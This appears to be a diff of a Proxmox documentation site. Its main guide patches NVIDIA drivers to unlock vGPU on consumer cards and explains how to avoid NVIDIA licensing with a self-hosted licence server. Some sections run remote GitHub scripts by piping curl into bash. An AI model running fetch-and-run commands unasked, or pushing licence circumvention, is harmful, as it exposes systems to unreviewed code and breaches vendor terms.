Enter the vgpu_unlock-rs
directory and compile the library. Depending on your hardware and internet connection that may take a while
cd vgpu_unlock-rs/
+cargo build --release
+
Create files for vGPU unlock The vgpu_unlock-rs library requires a few files and folders in order to work properly, lets create those
First create the folder for your vgpu unlock config and create an empty config file
mkdir /etc/vgpu_unlock
+touch /etc/vgpu_unlock/profile_override.toml
+
Then, create folders and files for systemd to load the vgpu_unlock-rs library when starting the nvidia vgpu services
mkdir /etc/systemd/system/{ nvidia-vgpud.service.d,nvidia-vgpu-mgr.service.d}
+echo -e "[Service]\nEnvironment=LD_PRELOAD=/opt/vgpu_unlock-rs/target/release/libvgpu_unlock_rs.so" > /etc/systemd/system/nvidia-vgpud.service.d/vgpu_unlock.conf
+echo -e "[Service]\nEnvironment=LD_PRELOAD=/opt/vgpu_unlock-rs/target/release/libvgpu_unlock_rs.so" > /etc/systemd/system/nvidia-vgpu-mgr.service.d/vgpu_unlock.conf
+
Have a vgpu supported card? Read here! If you don't have a card like the Tesla P4, or any other gpu from this list , please continue reading at Enabling IOMMU
Disable the unlock part as doing this on a gpu that already supports vgpu, could break things as it introduces unnecessary complexity and more points of possible failure:
echo "unlock = false" > /etc/vgpu_unlock/config.toml
+
Enabling IOMMU Note: Usually this isn't required for vGPU to work, but it doesn't hurt to enable it. You can skip this section, but if you run into problems later on, make sure to enable IOMMU. To enable IOMMU you have to enable it in your BIOS/UEFI first. Due to it being vendor specific, I am unable to provide instructions for that, but usually for Intel systems the option you are looking for is called something like "Vt-d", AMD systems tend to call it "IOMMU".
After enabling it in your BIOS/UEFI, you also have to enable it in your kernel. Depending on how your system is booting, there are two ways to do that.
If you installed your system with ZFS-on-root and in UEFI mode, then you are using systemd-boot, everything else is GRUB. GRUB is way more common so if you are unsure, you are probably using that.
Depending on which system you are using to boot, you have to chose from the following two options:
GRUB Open the file `/etc/default/grub` in your favorite editor The kernel parameters have to be appended to the variable `GRUB_CMDLINE_LINUX_DEFAULT`. On a clean installation that line should look like this GRUB_CMDLINE_LINUX_DEFAULT="quiet"
+
If you are using an Intel system, append this after `quiet`: intel_iommu=on iommu=pt
+
On AMD systems, append this after `quiet`: The result should look like this (for intel systems): GRUB_CMDLINE_LINUX_DEFAULT="quiet intel_iommu=on iommu=pt"
+
Now, save and exit from the editor using Ctrl+O and then Ctrl+X and then apply your changes: systemd-boot The kernel parameters have to be appended to the commandline in the file `/etc/kernel/cmdline`, so open that in your favorite editor: nano /etc/kernel/cmdline
+
On a clean installation the file might look similar to this: root=ZFS=rpool/ROOT/pve-1 boot=zfs
+
On Intel systems, append this at the end intel_iommu=on iommu=pt
+
For AMD, use this After editing the file, it should look similar to this root=ZFS=rpool/ROOT/pve-1 boot=zfs intel_iommu=on iommu=pt
+
Now, save and exit from the editor using Ctrl+O and then Ctrl+X and then apply your changes: proxmox-boot-tool refresh
+
Loading required kernel modules and blacklisting the open source nvidia driver We have to load the vfio
, vfio_iommu_type1
, vfio_pci
and vfio_virqfd
kernel modules to get vGPU working
echo -e "vfio\nvfio_iommu_type1\nvfio_pci\nvfio_virqfd" >> /etc/modules
+
Proxmox comes with the open source nouveau driver for nvidia gpus, however we have to use our patched nvidia driver to enable vGPU. The next line will prevent the nouveau driver from loading
echo "blacklist nouveau" >> /etc/modprobe.d/blacklist.conf
+
Applying our kernel configuration I'm not sure if this is needed, but it doesn't hurt :)
update-initramfs -u -k all
+
...and reboot
Check if IOMMU is enabled Note: See section "Enabling IOMMU", this is optional Wait for your server to restart, then type this into a root shell
dmesg | grep -e DMAR -e IOMMU
+
On my Intel system the output looks like this
[ 0.007235] ACPI: DMAR 0x000000009CC98B68 0000B8 (v01 INTEL BDW 00000001 INTL 00000001)
+[ 0.007255] ACPI: Reserving DMAR table memory at [mem 0x9cc98b68-0x9cc98c1f]
+[ 0.020766] DMAR: IOMMU enabled
+[ 0.062294] DMAR: Host address width 39
+[ 0.062296] DMAR: DRHD base: 0x000000fed90000 flags: 0x0
+[ 0.062300] DMAR: dmar0: reg_base_addr fed90000 ver 1:0 cap c0000020660462 ecap f0101a
+[ 0.062302] DMAR: DRHD base: 0x000000fed91000 flags: 0x1
+[ 0.062305] DMAR: dmar1: reg_base_addr fed91000 ver 1:0 cap d2008c20660462 ecap f010da
+[ 0.062307] DMAR: RMRR base: 0x0000009cc18000 end: 0x0000009cc25fff
+[ 0.062309] DMAR: RMRR base: 0x0000009f000000 end: 0x000000af1fffff
+[ 0.062312] DMAR-IR: IOAPIC id 8 under DRHD base 0xfed91000 IOMMU 1
+[ 0.062314] DMAR-IR: HPET id 0 under DRHD base 0xfed91000
+[ 0.062315] DMAR-IR: x2apic is disabled because BIOS sets x2apic opt out bit.
+[ 0.062316] DMAR-IR: Use 'intremap=no_x2apic_optout' to override the BIOS setting.
+[ 0.062797] DMAR-IR: Enabled IRQ remapping in xapic mode
+[ 0.302431] DMAR: No ATSR found
+[ 0.302432] DMAR: No SATC found
+[ 0.302433] DMAR: IOMMU feature pgsel_inv inconsistent
+[ 0.302435] DMAR: IOMMU feature sc_support inconsistent
+[ 0.302436] DMAR: IOMMU feature pass_through inconsistent
+[ 0.302437] DMAR: dmar0: Using Queued invalidation
+[ 0.302443] DMAR: dmar1: Using Queued invalidation
+[ 0.333474] DMAR: Intel(R) Virtualization Technology for Directed I/O
+[ 3.990175] i915 0000:00:02.0: [drm] DMAR active, disabling use of stolen memory
+
Depending on your mainboard and cpu, the output will be different, in my output the important line is the third one: DMAR: IOMMU enabled
. If you see something like that, IOMMU is enabled.
NVIDIA Driver This repo contains patches that allow you to use vGPU on not-qualified-vGPU cards (consumer GPUs). Those patches are binary patches, which means that each patch works ONLY for a specific driver version.
I've created patches for the following driver versions: - 16.2 (535.129.03) - Use this if you are on pve 8.0 (kernel 6.2, 6.5 should work too) - 16.1 (535.104.06) - 16.0 (535.54.06) - 15.1 (525.85.07) - 15.0 (525.60.12) - 14.4 (510.108.03) - 14.3 (510.108.03) - 14.2 (510.85.03)
You can choose which of those you want to use, but generally its recommended to use the latest, most up-to-date version (16.2 in this case).
If you have a vGPU qualified GPU, you can use other versions too, because you don't need to patch the driver. However, you still have to make sure they are compatible with your proxmox version and kernel. Also I would not recommend using any older versions unless you have a very specific requirement.
Obtaining the driver NVIDIA doesn't let you freely download vGPU drivers like they do with GeForce or normal Quadro drivers, instead you have to download them through the NVIDIA Licensing Portal (see: https://www.nvidia.com/en-us/drivers/vgpu-software-driver/ ). You can sign up for a free evaluation to get access to the download page.
NB: When applying for an eval license, do NOT use your personal email or other email at a free email provider like gmail.com. You will probably have to go through manual review if you use such emails. I have very good experience using a custom domain for my email address, that way the automatic verification usually lets me in after about five minutes.
I've created a small video tutorial to find the right driver version on the NVIDIA Enterprise Portal. In the video I'm downloading the 15.0 driver, if you want a different one just replace 15.0 with the version you want:
After downloading, extract the zip file and then copy the file called NVIDIA-Linux-x86_64-DRIVERVERSION-vgpu-kvm.run
(where DRIVERVERSION is a string like 535.129.03
) from the Host_Drivers
folder to your Proxmox host into the /root/
folder using tools like FileZilla, WinSCP, scp or rsync.
â ï¸ From here on, I will be using the 16.2 driver, but the steps are the same for other driver versions For example when I run a command like chmod +x NVIDIA-Linux-x86_64-535.129.03-vgpu-kvm.run
, you should replace 535.129.03
with the driver version you are using (if you are using a different one). You can get the list of version numbers here .
Every step where you potentially have to replace the version name will have this warning emoji next to it: â ï¸
Have a vgpu supported card? Read here! If you don't have a card like the Tesla P4, or any other gpu from this list , please continue reading at Patching the driver
With a supported gpu, patching the driver is not needed, so you should skip the next section. You can simply install the driver package like this:
â ï¸
chmod +x NVIDIA-Linux-x86_64-535.129.03-vgpu-kvm.run
+./NVIDIA-Linux-x86_64-535.129.03-vgpu-kvm.run --dkms
+
To finish the installation, reboot the system
Now, skip the following two sections and continue at Finishing touches
Patching the driver Now, on the proxmox host, make the driver executable
â ï¸
chmod +x NVIDIA-Linux-x86_64-535.129.03-vgpu-kvm.run
+
And then patch it
â ï¸
./NVIDIA-Linux-x86_64-535.129.03-vgpu-kvm.run --apply-patch ~/vgpu-proxmox/535.129.03.patch
+
That should output a lot of lines ending with Self-extractible archive "NVIDIA-Linux-x86_64-535.129.03-vgpu-kvm-custom.run" successfully created.
+
You should now have a file called NVIDIA-Linux-x86_64-535.129.03-vgpu-kvm-custom.run
, that is your patched driver.
Installing the driver Now that the required patch is applied, you can install the driver
â ï¸
./NVIDIA-Linux-x86_64-535.129.03-vgpu-kvm-custom.run --dkms
+
The installer will ask you Would you like to register the kernel module sources with DKMS? This will allow DKMS to automatically build a new module, if you install a different kernel later.
, answer with Yes
.
Depending on your hardware, the installation could take a minute or two.
If everything went right, you will be presented with this message.
Installation of the NVIDIA Accelerated Graphics Driver for Linux-x86_64 (version: 535.129.03) is now complete.
+
Click Ok
to exit the installer.
To finish the installation, reboot.
Finishing touches Wait for your server to reboot, then type this into the shell to check if the driver install worked
You should get an output similar to this one
Tue Jan 24 20:21:28 2023
++-----------------------------------------------------------------------------+
+| NVIDIA-SMI 525.85.07 Driver Version: 525.85.07 CUDA Version: N/A |
+|-------------------------------+----------------------+----------------------+
+| GPU Name Persistence-M| Bus-Id Disp.A | Volatile Uncorr. ECC |
+| Fan Temp Perf Pwr:Usage/Cap| Memory-Usage | GPU-Util Compute M. |
+| | | MIG M. |
+|===============================+======================+======================|
+| 0 NVIDIA GeForce ... On | 00000000:01:00.0 Off | N/A |
+| 26% 33C P8 43W / 260W | 85MiB / 11264MiB | 0% Default |
+| | | N/A |
++-------------------------------+----------------------+----------------------+
+
++-----------------------------------------------------------------------------+
+| Processes: |
+| GPU GI CI PID Type Process name GPU Memory |
+| ID ID Usage |
+|=============================================================================|
+| No running processes found |
++-----------------------------------------------------------------------------+
+
To verify if the vGPU unlock worked, type this command
The output will be similar to this
0000:01:00.0
+ nvidia-256
+ Available instances: 24
+ Device API: vfio-pci
+ Name: GRID RTX6000-1Q
+ Description: num_heads=4, frl_config=60, framebuffer=1024M, max_resolution=5120x2880, max_instance=24
+ nvidia-257
+ Available instances: 12
+ Device API: vfio-pci
+ Name: GRID RTX6000-2Q
+ Description: num_heads=4, frl_config=60, framebuffer=2048M, max_resolution=7680x4320, max_instance=12
+ nvidia-258
+ Available instances: 8
+ Device API: vfio-pci
+ Name: GRID RTX6000-3Q
+ Description: num_heads=4, frl_config=60, framebuffer=3072M, max_resolution=7680x4320, max_instance=8
+---SNIP---
+
If this command doesn't return any output, vGPU unlock isn't working.
Another command you can try to see if your card is recognized as being vgpu enabled is this one:
If everything worked right with the unlock, the output should be similar to this:
Tue Jan 24 20:21:43 2023
++-----------------------------------------------------------------------------+
+| NVIDIA-SMI 525.85.07 Driver Version: 525.85.07 |
+|---------------------------------+------------------------------+------------+
+| GPU Name | Bus-Id | GPU-Util |
+| vGPU ID Name | VM ID VM Name | vGPU-Util |
+|=================================+==============================+============|
+| 0 NVIDIA GeForce RTX 208... | 00000000:01:00.0 | 0% |
++---------------------------------+------------------------------+------------+
+
However, if you get this output, then something went wrong
No supported devices in vGPU mode
+
If any of those commands give the wrong output, you cannot continue. Please make sure to read everything here very carefully and when in doubt, create an issue or join the discord server and ask for help there.
vGPU overrides Further up we have created the file /etc/vgpu_unlock/profile_override.toml
and I didn't explain what it was for yet. Using that file you can override lots of parameters for your vGPU instances: For example you can change the maximum resolution, enable/disable the frame rate limiter, enable/disable support for CUDA or change the vram size of your virtual gpus.
If we take a look at the output of mdevctl types
we see lots of different types that we can choose from. However, if we for example chose GRID RTX6000-4Q
which gives us 4GB of vram in a VM, we are locked to that type for all of our VMs. Meaning we can only have 4GB VMs, its not possible to mix different types to have one 4GB VM, and two 2GB VMs.
Important notes Q profiles can give you horrible performance in OpenGL applications/games. To fix that, switch to an equivalent A or B profile (for example GRID RTX6000-4B
)
C profiles (for example GRID RTX6000-4C
) only work on Linux, don't try using those on Windows, it will not work - at all.
A profiles (for example GRID RTX6000-4A
) will NOT work on Linux, they only work on Windows.
All of that changes with the override config file. Technically we are still locked to only using one profile, but now its possible to change the vram of the profile on a VM basis so even though we have three GRID RTX6000-4Q
instances, one VM can have 4GB or vram but we can override the vram size for the other two VMs to only 2GB.
Lets take a look at this example config override file (its in TOML format)
[profile.nvidia-259]
+num_displays = 1 # Max number of virtual displays. Usually 1 if you want a simple remote gaming VM
+display_width = 1920 # Maximum display width in the VM
+display_height = 1080 # Maximum display height in the VM
+max_pixels = 2073600 # This is the product of display_width and display_height so 1920 * 1080 = 2073600
+cuda_enabled = 1 # Enables CUDA support. Either 1 or 0 for enabled/disabled
+frl_enabled = 1 # This controls the frame rate limiter, if you enable it your fps in the VM get locked to 60fps. Either 1 or 0 for enabled/disabled
+framebuffer = 0 x74000000
+framebuffer_reservation = 0 xC000000 # In combination with the framebuffer size
+ # above, these two lines will give you a VM
+ # with 2GB of VRAM (framebuffer + framebuffer_reservation = VRAM size in bytes).
+ # See below for some other sizes
+
+[vm.100]
+frl_enabled = 0
+# You can override all the options from above here too. If you want to add more overrides for a new VM, just copy this block and change the VM ID
+
There are two blocks here, the first being [profile.nvidia-259]
and the second [vm.100]
. The first one applies the overrides to all VM instances of the nvidia-259
type (thats GRID RTX6000-4Q
) and the second one applies its overrides only to one specific VM, that one with the proxmox VM ID 100
.
The proxmox VM ID is the same number that you see in the proxmox webinterface, next to the VM name.
You don't have to specify all parameters, only the ones you need/want. There are some more that I didn't mention here, you can find them by going through the source code of the vgpu_unlock-rs
repo.
For a simple 1080p remote gaming VM I recommend going with something like this
[ profile . nvidia-259 ] # choose the profile you want here
+num_displays = 1
+display_width = 1920
+display_height = 1080
+max_pixels = 2073600
+
Common VRAM sizes Here are some common framebuffer sizes that you might want to use:
512MB: framebuffer = 0 x1A000000
+framebuffer_reservation = 0 x6000000
+
1GB: framebuffer = 0 x38000000
+framebuffer_reservation = 0 x8000000
+
2GB: framebuffer = 0 x74000000
+framebuffer_reservation = 0 xC000000
+
3GB: framebuffer = 0 xB0000000
+framebuffer_reservation = 0 x10000000
+
4GB: framebuffer = 0 xEC000000
+framebuffer_reservation = 0 x14000000
+
5GB: framebuffer = 0 x128000000
+framebuffer_reservation = 0 x18000000
+
6GB: framebuffer = 0 x164000000
+framebuffer_reservation = 0 x1C000000
+
8GB: framebuffer = 0 x1DC000000
+framebuffer_reservation = 0 x24000000
+
10GB: framebuffer = 0 x254000000
+framebuffer_reservation = 0 x2C000000
+
12GB: framebuffer = 0 x2CC000000
+framebuffer_reservation = 0 x34000000
+
16GB: framebuffer = 0 x3BC000000
+framebuffer_reservation = 0 x44000000
+
20GB: framebuffer = 0 x4AC000000
+framebuffer_reservation = 0 x54000000
+
24GB: framebuffer = 0 x59C000000
+framebuffer_reservation = 0 x64000000
+
32GB: framebuffer = 0 x77C000000
+framebuffer_reservation = 0 x84000000
+
48GB: framebuffer = 0 xB2D200000
+framebuffer_reservation = 0 xD2E00000
+
framebuffer
and framebuffer_reservation
will always equal the VRAM size in bytes when added together.
Adding a vGPU to a Proxmox VM Go to the proxmox webinterface, go to your VM, then to Hardware
, then to Add
and select PCI Device
. You should be able to choose from a list of pci devices. Choose your GPU there, its entry should say Yes
in the Mediated Devices
column.
Now you should be able to also select the MDev Type
. Choose whatever profile you want, if you don't remember which one you want, you can see the list of all available types with mdevctl types
.
Finish by clicking Add
, start the VM and install the required drivers. After installing the drivers you can shut the VM down and remove the virtual display adapter by selecting Display
in the Hardware
section and selecting none (none)
. ONLY do that if you have some other way to access the Virtual Machine like Parsec or Remote Desktop because the Proxmox Console won't work anymore.
Enjoy your new vGPU VM :)
Licensing Usually a license is required to use vGPU, but luckily the community found several ways around that. Spoofing the vGPU instance to a Quadro GPU used to be very popular, but I don't recommend it anymore. I've also removed the related sections from this guide. If you still want it for whatever reason, you can go back in the commit history to find the instructions on how to use that.
The recommended way to get around the license is to set up your own license server. Follow the instructions here (or here if the other link is down).
Common problems Most problems can be solved by reading the instructions very carefully. For some very common problems, read here:
The nvidia driver won't install/load If you were using gpu passthrough before, revert ALL of the steps you did or start with a fresh proxmox installation. If you run lspci -knnd 10de:
and see vfio-pci
under Kernel driver in use:
then you have to fix that Make sure that you are using a supported kernel version (check uname -a
) My OpenGL performance is absolute garbage, what can I do? Read here mdevctl types
doesn't output anything, how to fix it? Make sure that you don't have unlock disabled if you have a consumer gpu (more information ) vGPU doesn't work on my RTX 3080! What to do? Learn to read Support If something isn't working, please create an issue or join the Discord server and ask for help in the #proxmox-support
channel so that the community can help you.
DO NOT SEND ME A DM, I'M NOT YOUR PERSONAL SUPPORT When asking for help, please describe your problem in detail instead of just saying "vgpu doesn't work". Usually a rough overview over your system (gpu, mainboard, proxmox version, kernel version, ...) and full output of dmesg
and/or journalctl --no-pager -b 0 -u nvidia-vgpu-mgr.service
(← this only after starting the VM that causes trouble) is helpful. Please also provide the output of uname -a
and cat /proc/cmdline
Feed my coffee addiction ☕ If you found this guide helpful and want to support me, please feel free to buy me a coffee . Thank you very much!
Further reading Thanks to all these people (in no particular order) for making this project possible - DualCoder for his original vgpu_unlock repo with the kernel hooks - mbilker for the rust version, vgpu_unlock-rs - KrutavShah for the wiki - HiFiPhile for the C version of vgpu unlock - rupansh for the original twelve.patch to patch the driver on kernels >= 5.12 - mbuchel#1878 on the GPU Unlocking discord for fourteen.patch to patch the driver on kernels >= 5.14 - erin-allison for the nvidia-smi wrapper script - LIL'pingu#9069 on the GPU Unlocking discord for his patch to nop out code that NVIDIA added to prevent usage of drivers with a version 460 - 470 with consumer cards
If I forgot to mention someone, please create an issue or let me know otherwise.
Contributing Pull requests are welcome (factual errors, amendments, grammar/spelling mistakes etc).
Back to top
\ No newline at end of file
diff --git a/infrastructure/proxmox/lets-encrypt-cloudflare/index.html b/infrastructure/proxmox/lets-encrypt-cloudflare/index.html
new file mode 100644
index 000000000..fb360d541
--- /dev/null
+++ b/infrastructure/proxmox/lets-encrypt-cloudflare/index.html
@@ -0,0 +1,167 @@
+
Let's Encrypt with Cloudflare - 3os proxmox cloudflare letsencrypt Authors: fire1ce | Created: 2022-04-22 | Last update: 2022-07-18 Proxmox Valid SSL With Let's Encrypt and Cloudflare DNS This is a guide to how to setup a valid SSL certificate with Let's Encrypt and Cloudflare DNS
for Proxmox VE
. Let's Encrypt will allow you to obtain a valid SSL certificate for your Proxmox VE Server for free for 90 days. In the following steps, we will setup a valid SSL certificate for your Proxmox VE Server using Let's Encrypt and Cloudflare DNS Challenge. The process of renewing the certificate is done automatically by Proxmox VE Server and you do not need to do anything manually to renew the certificate.
Prerequarements Exisiting DNS record for the domain name you want to use for Proxmox VE. Cloudflare DNS Zone API Access Token. Cloudflare DNS Zone ID. I won't be covcovering the process of creating the Zone API Tokens at this guide. You can find more information about this process here .
Instalaion and Configuration The process will be done fully in Proxmox web interface. Login to the Proxmox web interface select Datacenter
, find ACME
and click on it.
At Account
section, click Add. Fill the Account Name
and E-Mail
. Accept the Terms and Conditions (TOC). Click Register
. This will register an account for Let's Encrypt service in order to obtain a certificate.
The output should be something like this:
At Challenge Plugin
ection, click Add. Fill the Plugin ID
(name), at DNS API
choose Cloudflare Managed DNS
. CF_Token=
and CF_Zone_ID=
are the API Tokens and Zone ID for Cloudflare DNS - leave the rest empty.
The final screen should look like this:
Select the Pve Server
in my case its name proxmox
, under System
select Certificates
.
At ACME
section, click Edit
and select the Account
we created earlier.
Click Add
, select Challenge Type
DNS
and Challenge Plugin
the plugin we created earlier. Domain
is the domain name we want to use for the certificate. Click Create
.
Now its time to issue the certificate. Click Order Certificate Now
.
At this point Proxmox will try to issue the certificate from Let's Encrypt and validate it with Cloudflare DNS Challenge.
If all goes well, you will see the following:
Now the certificate is installed and ready to use. The renewal process is done automatically by Proxmox VE Server.
Back to top
\ No newline at end of file
diff --git a/infrastructure/proxmox/network/disable-ipv6/index.html b/infrastructure/proxmox/network/disable-ipv6/index.html
new file mode 100644
index 000000000..42b1a4c86
--- /dev/null
+++ b/infrastructure/proxmox/network/disable-ipv6/index.html
@@ -0,0 +1,171 @@
+
Disable IPv6 on Proxmox - 3os proxmox ipv6 Authors: fire1ce | Created: 2022-02-04 | Last update: 2022-06-30 Disable IPv6 on Proxmox Permanently By default, Proxmox IPv6 is enabled after installation. This means that the IPv6 stack is active and the host can communicate with other hosts on the same network via IPv6 protocol.
Output of ip addr
command:
You can disable IPv6 on Proxmox VE by editing the /etc/default/grub
file.
add ipv6.disable=1
to the end of GRUB_CMDLINE_LINUX_DEFAULT
and GRUB_CMDLINE_LINUX
line. Don't change the other values at those lines.
GRUB_CMDLINE_LINUX_DEFAULT = "ipv6.disable=1"
+GRUB_CMDLINE_LINUX = "ipv6.disable=1"
+
The config should look like this:
Update the grub configuration.
Save and exit. Reboot Proxmox Server to apply the changes.
Output of ip addr
command after disabling IPv6 on Proxmox VE:
Back to top
\ No newline at end of file
diff --git a/infrastructure/proxmox/network/proxmox-networking/index.html b/infrastructure/proxmox/network/proxmox-networking/index.html
new file mode 100644
index 000000000..f1f387065
--- /dev/null
+++ b/infrastructure/proxmox/network/proxmox-networking/index.html
@@ -0,0 +1,267 @@
+
Proxmox Networking - 3os proxmox network Proxmox Networking Official Proxmox networking documentation can be found here .
Basics Proxmox network configuration file location /etc/network/interfaces
+
Restart proxmox network service to apply changes systemctl restart networking.service
+
Example of Multi Network Interface Server The next examples will be based on the following network nics, ip addr
output:
1 : lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
+ link/loopback 00 :00:00:00:00:00 brd 00 :00:00:00:00:00
+ inet 127 .0.0.1/8 scope host lo
+ valid_lft forever preferred_lft forever
+2 : enp7s0: <BROADCAST,MULTICAST> mtu 1500 qdisc noop state DOWN group default qlen 1000
+ link/ether 18 :c0:4d:00:9f:b7 brd ff:ff:ff:ff:ff:ff
+3 : enp6s0: <BROADCAST,MULTICAST> mtu 1500 qdisc noop state DOWN group default qlen 1000
+ link/ether 18 :c0:4d:00:9f:b9 brd ff:ff:ff:ff:ff:ff
+4 : enp12s0f4: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq master vmbr0 state UP group default qlen 1000
+ link/ether 00 :07:43:29:42:c0 brd ff:ff:ff:ff:ff:ff
+5 : enp12s0f4d1: <BROADCAST,MULTICAST> mtu 1500 qdisc noop state DOWN group default qlen 1000
+ link/ether 00 :07:43:29:42:c8 brd ff:ff:ff:ff:ff:ff
+6 : enp12s0f4d2: <BROADCAST,MULTICAST> mtu 1500 qdisc noop state DOWN group default qlen 1000
+ link/ether 00 :07:43:29:42:d0 brd ff:ff:ff:ff:ff:ff
+7 : enp12s0f4d3: <BROADCAST,MULTICAST> mtu 1500 qdisc noop state DOWN group default qlen 1000
+ link/ether 00 :07:43:29:42:d8 brd ff:ff:ff:ff:ff:ff
+8 : wlp5s0: <BROADCAST,MULTICAST> mtu 1500 qdisc noop state DOWN group default qlen 1000
+ link/ether 8c:c6:81:f0:a6:9a brd ff:ff:ff:ff:ff:ff
+9 : vmbr0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default qlen 1000
+ link/ether 00 :07:43:29:42:c0 brd ff:ff:ff:ff:ff:ff
+ inet 192 .168.100.12/24 scope global vmbr0
+ valid_lft forever preferred_lft forever
+
In order Identify physical network interfaces corresponding to Network Interfaces name in Proxmox you can follow this guide
Breakdown of the ip addr
output:
lo
is a loopback interface. enp7s0
is a 2.5G network interface. enp6s0
is a 1G network interface. enp12s0f4
is a 10G network interface. enp12s0f4d1
is a 10G network interface. enp12s0f4d2
is a 10G network interface. enp12s0f4d3
is a 10G network interface. wlp5s0
is a Wifi network interface vmbr0
is a bridge interface. The content of the /etc/network/interfaces
after fresh installation:
auto lo
+iface lo inet loopback
+
+iface enp12s0f4 inet manual
+
+auto vmbr0
+iface vmbr0 inet static
+ address 192 .168.100.12/24
+ gateway 192 .168.100.1
+ bridge-ports enp12s0f4
+ bridge-stp off
+ bridge-fd 0
+
+iface enp7s0 inet manual
+
+iface enp6s0 inet manual
+
+iface enp12s0f4d1 inet manual
+
+iface enp12s0f4d2 inet manual
+
+iface enp12s0f4d3 inet manual
+
+iface wlp5s0 inet manual
+
Info
vmbr0
is a bridge interface. It's used to provision network to virtual machines and containers on Proxmox VE Server. We can assign multiple network interfaces to the bridge interface with bridge-ports
option.
Static IP Bridge Configuration The following example shows a static IP configuration vmbr0
bridge interface, including two network interfaces enp12s0f4
and enp7s0
.
auto vmbr0
+iface vmbr0 inet static
+ address 192.168.100.12/24
+ gateway 192.168.100.1
+ bridge-ports enp12s0f4 enp7s0
+ bridge-stp off
+ bridge-fd 0
+
Configuring multi network interfaces to the bridge interface will provide you a failover behavior when the network interface is down or disconnected - for example, when specific switch is down.
Static IP Bridge with VLAN Aware Configuration The following example shows a static IP as above but with VLAN Aware bridge.
auto vmbr0
+iface vmbr0 inet static
+ address 192.168.100.12/24
+ gateway 192.168.100.1
+ bridge-ports enp12s0f4 enp7s0
+ bridge-stp off
+ bridge-fd 0
+ bridge-vlan-aware yes
+ bridge-vids 2-4094
+
DHCP Bridge Configuration The following example shows a DHCP configuration vmbr0
bridge interface, including two network interfaces enp12s0f4
and enp7s0
.
auto vmbr0
+iface vmbr0 inet dhcp
+ bridge-ports enp12s0f4 enp7s0
+ bridge-stp off
+ bridge-fd 0
+
DHCP Bridge with VLAN Aware Configuration The following example shows a DHCP as above but with VLAN Aware bridge.
auto vmbr0
+iface vmbr0 inet dhcp
+ bridge-ports enp12s0f4 enp7s0
+ bridge-stp off
+ bridge-fd 0
+ bridge-vlan-aware yes
+ bridge-vids 2-4094
+
Personal Network Configuration Here's a sample of the /etc/network/interfaces
file for a personal network:
auto lo
+iface lo inet loopback
+
+auto vmbr0
+iface vmbr0 inet dhcp
+ bridge-ports enp12s0f4 enp12s0f4d1 enp12s0f4d2 enp12s0f4d3 enp7s0
+ bridge-stp off
+ bridge-fd 0
+ bridge-vlan-aware yes
+ bridge-vids 2 -4094
+
+iface enp12s0f4 inet manual
+
+iface enp12s0f4d1 inet manual
+
+iface enp12s0f4d2 inet manual
+
+iface enp12s0f4d3 inet manual
+
+iface enp7s0 inet manual
+
+iface enp6s0 inet manual
+
+iface wlp5s0 inet manual
+
Back to top
\ No newline at end of file
diff --git a/infrastructure/proxmox/pvekclean/index.html b/infrastructure/proxmox/pvekclean/index.html
new file mode 100644
index 000000000..cf00b23fd
--- /dev/null
+++ b/infrastructure/proxmox/pvekclean/index.html
@@ -0,0 +1,186 @@
+
PVE Kernel Cleaner - 3os proxmox Authors: fire1ce | Created: 2022-03-15 | Last update: 2022-04-21 PVE Kernel Cleaner
Easily remove old/unused PVE kernels on your Proxmox VE system
Developers Jordan Hillis - Lead Developer The original pvekclean github page
What is PVE Kernel Cleaner? PVE Kernel Cleaner is a program to compliment Proxmox Virtual Environment which is an open-source server virtualization environment. PVE Kernel Cleaner allows you to purge old/unused kernels filling the /boot directory. As new kernels are released the older ones have to be manually removed frequently to make room for newer ones. This can become quite tedious and require extensive time spent monitoring the system when new kernels are released and when older ones need to be cleared out to make room. With this issue existing, PVE Kernel Cleaner was created to solve it.
Features Removes old PVE kernels from your system Ability to schedule PVE kernels to automatically be removed on a daily/weekly/monthly basis Run a simple pvekclean command for ease of access Checks health of boot disk based on space available Debug mode for non-destructive testing Update function to easily update the program to the latest version Allows you to specify the minimum number of most recent PVE kernels to retain Support for the latest Proxmox versions and PVE kernels Prerequisites Before using this program you will need to have the following packages installed. * cron * curl * git
To install all required packages enter the following command.
Debian: sudo apt-get install cron curl git
+
Installing You can install PVE Kernel Cleaner using either Git or Curl. Choose the method that suits you best:
Installation via Git Open your terminal.
Enter the following commands one by one to install PVE Kernel Cleaner:
git clone https://github.com/jordanhillis/pvekclean.git
+cd pvekclean
+chmod +x pvekclean.sh
+./pvekclean.sh
+
Installation via Curl Open your terminal.
Use the following command to install PVE Kernel Cleaner:
curl -o pvekclean.sh https://raw.githubusercontent.com/jordanhillis/pvekclean/master/pvekclean.sh
+chmod +x pvekclean.sh
+./pvekclean.sh
+
Updating PVE Kernel Cleaner checks for updates automatically when you run it. If an update is available, you'll be notified within the program. Simply follow the on-screen instructions to install the update, and you're all set with the latest version!
Usage Example of usage:
pvekclean [OPTION1] [OPTION2]...
+
+-k, --keep [number] Keep the specified number of most recent PVE kernels on the system
+ Can be used with -f or --force for non-interactive removal
+-f, --force Force the removal of old PVE kernels without confirm prompts
+-rn, --remove-newer Remove kernels that are newer than the currently running kernel
+-s, --scheduler Have old PVE kernels removed on a scheduled basis
+-v, --version Shows current version of pvekclean
+-r, --remove Uninstall pvekclean from the system
+-i, --install Install pvekclean to the system
+-d, --dry-run Run the program in dry run mode for testing without making system changes
+
Back to top
\ No newline at end of file
diff --git a/infrastructure/proxmox/vm-disk-expander/index.html b/infrastructure/proxmox/vm-disk-expander/index.html
new file mode 100644
index 000000000..bb8cc1e72
--- /dev/null
+++ b/infrastructure/proxmox/vm-disk-expander/index.html
@@ -0,0 +1,201 @@
+
VM Disk Expander - 3os proxmox virtualization Authors: fire1ce | Created: 2022-06-26 | Last update: 2022-06-26 Proxmox Virtual Machine Disk Expander Github Repository: Proxmox vm disk expander
Interactive disk expander for Proxmox's VM disks (including the partition) from your Proxmox host cli.
Curl Method Run the script once, without installing it.
bash <( curl -s https://raw.githubusercontent.com/bermanboris/proxmox-vm-disk-expander/main/expand.sh)
+
Installer Install the script at Proxmox host for multiple use.
Run the following command from Proxmox host:
curl -sS https://raw.githubusercontent.com/bermanboris/proxmox-vm-disk-expander/main/install.sh | bash
+
Usage Update Same as the installer.
curl -sS https://raw.githubusercontent.com/bermanboris/proxmox-vm-disk-expander/main/install.sh | bash
+
Example usage/output â•â”€root@proxmox ~
